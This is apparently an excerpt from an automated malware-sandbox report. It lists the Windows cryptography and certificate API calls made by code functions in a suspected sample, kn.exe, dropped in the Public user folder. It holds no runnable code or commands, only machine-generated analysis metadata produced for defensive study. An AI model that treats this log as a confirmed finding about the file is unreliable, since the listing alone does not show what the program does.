Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54BB2B4 #357,CryptHashCertificate,GetLastError,#357,memcmp,#358,6_2_00007FF6C54BB2B4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F32A8 CryptGetProvParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,6_2_00007FF6C54F32A8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C551D28C CryptFindOIDInfo,CryptEnumOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,#358,6_2_00007FF6C551D28C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5527290 NCryptIsKeyHandle,#359,#360,#357,#358,6_2_00007FF6C5527290
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C548D240 #357,CryptFindOIDInfo,#357,LocalFree,6_2_00007FF6C548D240
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DD30C BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,6_2_00007FF6C54DD30C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C548D304 #357,CryptFindOIDInfo,#359,LocalAlloc,CryptEncodeObjectEx,GetLastError,LocalFree,LocalFree,LocalFree,6_2_00007FF6C548D304
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C548B324 CryptDecodeObject,GetLastError,#357,#357,LocalFree,6_2_00007FF6C548B324
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54D32D0 #359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,6_2_00007FF6C54D32D0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54B92C4 memset,CryptHashCertificate,GetLastError,CryptHashCertificate,GetLastError,GetLastError,GetLastError,#357,#254,LocalAlloc,wcsstr,LocalAlloc,LocalAlloc,#357,memmove,GetLastError,GetProcAddress,GetLastError,GetLastError,#359,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FreeLibrary,6_2_00007FF6C54B92C4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54EF2F0 BCryptCreateHash,#205,#357,#357,#357,#357,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF6C54EF2F0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54C92D8 CertEnumCertificatesInStore,CertGetCRLContextProperty,CertSetCTLContextProperty,GetLastError,#357,#357,CertEnumCertificatesInStore,CryptMsgControl,GetLastError,#357,CryptMsgGetAndVerifySigner,GetLastError,#357,CryptMsgGetAndVerifySigner,#357,CertFreeCertificateContext,CertGetCRLContextProperty,CertEnumCertificatesInStore,#357,#357,#207,LocalFree,#357,#357,CertFreeCertificateContext,CompareFileTime,CertFreeCertificateContext,6_2_00007FF6C54C92D8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54D3188 CryptAcquireContextW,GetLastError,#359,#359,CryptAcquireContextW,GetLastError,6_2_00007FF6C54D3188
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5527178 BCryptCloseAlgorithmProvider,#360,6_2_00007FF6C5527178
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54C51A4 #360,#357,#359,#207,CryptFindOIDInfo,#357,GetLastError,#357,#207,#360,#254,#358,LocalFree,LocalFree,LocalFree,6_2_00007FF6C54C51A4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DF168 CryptDuplicateKey,GetLastError,#357,CryptEncrypt,GetLastError,CryptEncrypt,GetLastError,CryptDestroyKey,6_2_00007FF6C54DF168
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54D5164 GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,6_2_00007FF6C54D5164
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5549208 #357,NCryptEnumKeys,#360,#358,6_2_00007FF6C5549208
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5527214 NCryptIsKeyHandle,#357,CryptReleaseContext,GetLastError,6_2_00007FF6C5527214
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F11C8 NCryptVerifySignature,#205,#357,#357,#357,#357,6_2_00007FF6C54F11C8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F31C0 CryptGetKeyParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,6_2_00007FF6C54F31C0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C55271C8 BCryptDestroyKey,#360,6_2_00007FF6C55271C8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C551F4A0 CryptHashPublicKeyInfo,SetLastError,6_2_00007FF6C551F4A0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DF488 #357,LocalAlloc,memmove,CryptDuplicateKey,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,LocalFree,6_2_00007FF6C54DF488
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F9480 memmove,BCryptDecrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,memmove,BCryptEncrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF6C54F9480
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C550B464 CryptEncodeObjectEx,SetLastError,6_2_00007FF6C550B464
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5455438 memset,#246,#357,#357,GetLastError,#357,CertFindExtension,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,6_2_00007FF6C5455438
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54B3504 CreateFileW,GetLastError,#357,GetFileSize,GetLastError,#357,SetFilePointer,GetLastError,#357,CertFreeCertificateContext,CertFreeCertificateContext,CryptDestroyKey,CryptReleaseContext,CloseHandle,6_2_00007FF6C54B3504
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F34F8 CryptImportPublicKeyInfo,#205,GetLastError,#357,#357,SetLastError,6_2_00007FF6C54F34F8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C550B4EC CryptDecodeObjectEx,SetLastError,6_2_00007FF6C550B4EC
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C55214F0 GetEnvironmentVariableW,#205,#205,#203,CryptDestroyHash,CryptReleaseContext,CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptReleaseContext,GetLastError,#357,#357,#203,#357,#357,#357,#357,#203,LocalFree,#203,#357,#357,#207,#203,#203,LocalFree,#203,#203,CryptDestroyHash,CryptReleaseContext,6_2_00007FF6C55214F0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F3390 CryptGetUserKey,#205,GetLastError,#357,#357,SetLastError,6_2_00007FF6C54F3390
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C552739C CryptAcquireContextW,GetLastError,#360,#360,SetLastError,6_2_00007FF6C552739C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C55293A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,6_2_00007FF6C55293A0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C55033B0 CertFindExtension,#357,CryptDecodeObject,GetLastError,#357,#357,6_2_00007FF6C55033B0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54D33A0 CryptVerifyCertificateSignature,CertCompareCertificateName,6_2_00007FF6C54D33A0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54AB350 CryptFindLocalizedName,CertEnumPhysicalStore,GetLastError,#357,6_2_00007FF6C54AB350
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54B5338 wcsrchr,#357,#357,LocalAlloc,memmove,wcsrchr,GetLastError,#360,#357,#357,LocalFree,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF6C54B5338
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5487340 GetModuleHandleW,GetProcAddress,GetLastError,BCryptExportKey,#360,LocalAlloc,CryptHashCertificate2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalFree,6_2_00007FF6C5487340
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C547B36C GetLastError,CryptHashCertificate,GetLastError,CryptHashCertificate2,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#357,#357,#357,LocalFree,SysFreeString,6_2_00007FF6C547B36C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C552141C GetLastError,CryptDecodeObjectEx,GetLastError,#357,LocalFree,6_2_00007FF6C552141C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF6C54F342C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54B13F0 CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptHashData,CryptHashData,GetLastError,CryptImportPublicKeyInfo,CryptVerifySignatureW,CertCreateCertificateContext,#357,LocalFree,GetLastError,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,6_2_00007FF6C54B13F0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54D53E8 CryptEncodeObjectEx,GetLastError,#357,6_2_00007FF6C54D53E8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,6_2_00007FF6C54DB3D8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DDEB0 wcscspn,#357,GetFileAttributesW,GetLastError,#359,CertEnumCertificatesInStore,CertGetCRLContextProperty,CryptBinaryToStringW,wcsstr,CertEnumCertificatesInStore,GetLastError,GetLastError,LocalFree,LocalFree,CertCloseStore,CertFreeCertificateContext,6_2_00007FF6C54DDEB0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54ADEA4 memset,GetSystemTimeAsFileTime,CryptGenRandom,GetLastError,LocalAlloc,GetLastError,#357,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,6_2_00007FF6C54ADEA4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C551DE70 NCryptIsKeyHandle,#357,CryptExportKey,GetLastError,#358,LocalAlloc,#357,CryptExportKey,GetLastError,LocalFree,6_2_00007FF6C551DE70
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5555E3C CryptDecodeObjectEx,strcmp,strcmp,strcmp,6_2_00007FF6C5555E3C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54A7F14 CryptAcquireCertificatePrivateKey,GetLastError,#357,CryptSetProvParam,GetLastError,GetSecurityDescriptorLength,#359,CryptReleaseContext,6_2_00007FF6C54A7F14
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5555F20 CryptDecodeObjectEx,6_2_00007FF6C5555F20
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54E5F04 #357,#357,SysAllocStringByteLen,#357,SysFreeString,#357,#359,#357,lstrcmpW,CryptMsgControl,GetLastError,#357,CertFreeCertificateContext,#359,CertFreeCTLContext,LocalFree,SysFreeString,LocalFree,6_2_00007FF6C54E5F04
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5527EE8 CryptFindOIDInfo,#357,CryptInitOIDFunctionSet,CryptGetOIDFunctionAddress,GetLastError,GetLastError,GetLastError,#357,strcmp,GetLastError,strcmp,GetLastError,CryptFindOIDInfo,CryptFindOIDInfo,#357,LocalFree,LocalFree,CryptFreeOIDFunctionAddress,LocalFree,LocalFree,6_2_00007FF6C5527EE8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54ADD80 CertFindExtension,CryptDecodeObject,6_2_00007FF6C54ADD80
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5505D80 #357,NCryptIsKeyHandle,GetSecurityDescriptorLength,CryptSetProvParam,GetLastError,LocalFree,#357,6_2_00007FF6C5505D80
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5485DA1 #358,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,6_2_00007FF6C5485DA1
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5555D74 CryptDecodeObjectEx,strcmp,strcmp,6_2_00007FF6C5555D74
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54B1D70 #357,LocalAlloc,memmove,#357,CryptSetKeyParam,GetLastError,LocalAlloc,memmove,CryptDecrypt,GetLastError,#357,#357,#358,LocalFree,LocalFree,#357,#357,#357,LocalFree,LocalFree,LocalFree,6_2_00007FF6C54B1D70
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C552BD3C NCryptIsKeyHandle,#357,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,LocalFree,6_2_00007FF6C552BD3C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5527D3C #357,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,wcschr,CryptFindOIDInfo,#359,LocalFree,6_2_00007FF6C5527D3C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54A9D6C #357,#357,#359,LocalAlloc,#357,#357,wcsrchr,LocalAlloc,memmove,CryptFindLocalizedName,wcsrchr,CryptFindLocalizedName,#357,GetLastError,#359,CertOpenStore,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6C54A9D6C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54D3D60 #359,GetLastError,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,CryptReleaseContext,6_2_00007FF6C54D3D60
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5485DF7 GetLastError,#357,#357,#358,#358,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCRLsInStore,CertEnumCRLsInStore,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,#357,6_2_00007FF6C5485DF7
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54E1E2C CryptAcquireContextW,GetLastError,#357,CryptGenKey,GetLastError,CryptDestroyKey,#357,GetLastError,#357,#357,LocalAlloc,#357,memmove,LocalFree,memset,CryptGenRandom,GetLastError,#357,GetSystemTime,SystemTimeToFileTime,GetLastError,CertCreateCertificateContext,GetLastError,CryptReleaseContext,LocalFree,LocalFree,LocalFree,6_2_00007FF6C54E1E2C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5461DE8 GetSystemDefaultLangID,wcscspn,LocalFree,LocalFree,CryptEnumOIDInfo,qsort,free,6_2_00007FF6C5461DE8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54C4070 _wcsnicmp,_wcsnicmp,_wcsnicmp,#357,GetLastError,#359,#357,LocalAlloc,memmove,wcsstr,#223,#357,#359,LocalFree,#359,LocalFree,LocalFree,LocalFree,LocalFree,CryptMemFree,6_2_00007FF6C54C4070
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C551E044 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,LocalAlloc,#359,LocalFree,6_2_00007FF6C551E044
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54860DA #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,6_2_00007FF6C54860DA
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F9F90 memmove,wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,6_2_00007FF6C54F9F90
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F5FA8 NCryptIsKeyHandle,wcscmp,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,6_2_00007FF6C54F5FA8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54C5F54 GetLastError,LocalAlloc,memmove,wcschr,CryptFindOIDInfo,#357,#357,LocalFree,LocalFree,6_2_00007FF6C54C5F54
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C548FF64 NCryptGetProperty,#359,NCryptGetProperty,CertEnumCertificatesInStore,CertFindCertificateInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertFreeCertificateContext,CertCloseStore,CertCloseStore,#357,6_2_00007FF6C548FF64
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5555FF0 CryptDecodeObjectEx,CryptDecodeObjectEx,6_2_00007FF6C5555FF0
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5485FE8 #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,6_2_00007FF6C5485FE8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5555AA8 CryptDecodeObjectEx,6_2_00007FF6C5555AA8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C551FA84 LocalAlloc,#357,memmove,CryptDecrypt,GetLastError,#357,LocalFree,6_2_00007FF6C551FA84
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5509A58 #357,#357,#210,#357,SetWindowTextW,SetFocus,SendMessageW,SendMessageW,LocalAlloc,#357,#357,LocalFree,UpdateWindow,CoInitialize,LoadCursorW,SetCursor,LoadCursorW,SetCursor,SetFocus,SetWindowTextW,SetFocus,#357,SetFocus,SendMessageW,#357,LocalFree,LocalFree,LocalFree,CryptUIDlgFreeCAContext,CoUninitialize,6_2_00007FF6C5509A58
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F1A44 CryptContextAddRef,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,6_2_00007FF6C54F1A44
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5483A40 LocalFree,LocalFree,strcmp,#357,strcmp,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,CryptDecodeObject,strcmp,LocalFree,strcmp,GetLastError,#357,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,#357,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,strcmp,strcmp,strcmp,#357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,LocalFree,strcmp,LocalFree,GetLastError,strcmp,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6C5483A40
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54F7A70 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,NCryptSecretAgreement,#205,#357,#357,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,NCryptDeriveKey,#205,#359,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,6_2_00007FF6C54F7A70
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C550BA50 CryptSignCertificate,SetLastError,6_2_00007FF6C550BA50
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54B3B14 NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,CryptDestroyKey,6_2_00007FF6C54B3B14
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54E9AF8 CertCloseStore,CertCloseStore,CryptMsgClose,LocalFree,LocalFree,NCryptFreeObject,6_2_00007FF6C54E9AF8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5487988 CryptFindOIDInfo,#357,CryptFindOIDInfo,#357,GetLastError,#357,GetLastError,#357,LocalFree,6_2_00007FF6C5487988
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54D597C GetLastError,CryptEncodeObjectEx,GetLastError,#357,6_2_00007FF6C54D597C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C554B980 #357,CryptFindOIDInfo,#359,GetLastError,#357,#359,CryptGetProvParam,memset,CryptGetProvParam,CryptFindOIDInfo,#357,GetLastError,#357,CryptReleaseContext,BCryptFreeBuffer,6_2_00007FF6C554B980
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DB950 I_CryptGetLruEntryData,#357,6_2_00007FF6C54DB950
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54AF944 CryptDecodeObject,GetLastError,#357,6_2_00007FF6C54AF944
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5519970 LocalAlloc,#357,LocalAlloc,CertGetEnhancedKeyUsage,GetLastError,#358,LocalFree,LocalFree,GetLastError,strcmp,#357,CryptFindOIDInfo,LocalFree,6_2_00007FF6C5519970
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C552BA14 NCryptIsKeyHandle,#357,CryptGetProvParam,GetLastError,NCryptFreeObject,6_2_00007FF6C552BA14
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54DB9CC I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,6_2_00007FF6C54DB9CC
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C547F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,6_2_00007FF6C547F9B8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54E1C84 GetLastError,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,#357,LocalFree,6_2_00007FF6C54E1C84
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5491C50 BCryptQueryProviderRegistration,#360,#357,BCryptFreeBuffer,6_2_00007FF6C5491C50
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54A3C60 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,CryptExportPublicKeyInfo,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertCreateCertificateContext,GetLastError,#357,#357,CertComparePublicKeyInfo,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertSetCTLContextProperty,GetLastError,#357,#357,#358,#358,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF6C54A3C60
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5555C54 CryptDecodeObjectEx,CryptDecodeObjectEx,6_2_00007FF6C5555C54
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C550DD1C #357,strcmp,GetLastError,CryptHashCertificate,GetLastError,LocalAlloc,memmove,LocalFree,6_2_00007FF6C550DD1C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C551FD2C CryptDecryptMessage,GetLastError,#357,6_2_00007FF6C551FD2C
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54E5CE8 #357,CertOpenStore,GetLastError,CertFindCertificateInStore,GetLastError,#359,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptVerifyCertificateSignature,GetLastError,#357,6_2_00007FF6C54E5CE8
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C547BB80 #357,NCryptIsKeyHandle,#357,LocalFree,LocalFree,6_2_00007FF6C547BB80
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5455BA4 #357,NCryptIsKeyHandle,strcmp,GetLastError,strcmp,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#359,LocalAlloc,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,LocalFree,SysFreeString,CertFreeCertificateContext,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF6C5455BA4
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5555B90 CryptDecodeObjectEx,memmove,6_2_00007FF6C5555B90
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C551FB94 #357,CryptFindOIDInfo,LocalAlloc,CryptEncryptMessage,GetLastError,LocalFree,#357,6_2_00007FF6C551FB94
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54FFB50 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,#357,CryptExportPublicKeyInfo,GetLastError,GetLastError,#357,#357,CertFindExtension,LocalAlloc,#357,memmove,#357,#357,#357,#357,#357,CAFindCertTypeByName,CAGetCertTypeExtensions,#357,#358,CertFindExtension,#357,LocalAlloc,memmove,memmove,#357,#357,GetLastError,#357,CertFindExtension,#357,GetLastError,#357,CryptSignAndEncodeCertificate,GetLastError,#357,LocalAlloc,CryptSignAndEncodeCertificate,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CAFreeCertTypeExtensions,CACloseCertType,6_2_00007FF6C54FFB50
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5527B60 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptFindOIDInfo,LocalAlloc,#357,memmove,CryptReleaseContext,6_2_00007FF6C5527B60
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54BBB38 #357,CryptVerifyCertificateSignatureEx,GetLastError,#357,memcmp,GetSystemTimeAsFileTime,CompareFileTime,CompareFileTime,CompareFileTime,#357,#358,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6C54BBB38
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C5525B44 CertFindExtension,#357,CryptDecodeObject,GetLastError,6_2_00007FF6C5525B44
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C552BB50 NCryptIsKeyHandle,#359,CertCreateCertificateContext,GetLastError,LocalFree,CryptGetKeyParam,GetLastError,#358,LocalAlloc,#357,CryptGetKeyParam,GetLastError,#357,6_2_00007FF6C552BB50
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C54AFC34 memset,#357,CryptDecodeObject,GetLastError,LocalAlloc,#357,memmove,memset,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6C54AFC34
Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6C548FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,6_2_00007FF6C548FC20
